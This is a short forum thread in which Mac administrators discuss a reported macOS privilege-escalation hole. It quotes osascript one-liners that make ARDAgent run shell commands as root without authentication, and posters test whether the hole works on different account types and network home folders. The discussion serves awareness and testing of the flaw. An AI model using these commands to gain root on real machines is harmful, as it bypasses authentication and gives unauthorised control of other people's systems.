Quote:
Originally Posted by
afriend
Today an anonymous Slashdot user posted this little shell command, which uses the ARDAgent to gain root access without ever needing to authenticate.
The script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
It can be used for things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.
It has been tested by quite a few people, and has been found only to work if you are physically at a computer and it's logged in.
However, where I work we use network shares as our home folders, and this hack doesn't seem to work. I just wanted to make sure that there was no way it would work.
When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
Does anyone think it's possible?
I just tested that on the MacBook Pro I use day to day using an admin account, a normal account and the built in guest account and I have to say...
CRIKEY!
I was hoping maybe it was only a problem if you were logged in as an admin user, but it isn't. I'll test it at work tomorrow when I can get access to my test machines and try it with network clients.
This is really some quite major privilege escalation; it's a built-in rootkit.
Thank you very much for bringing that to my attention.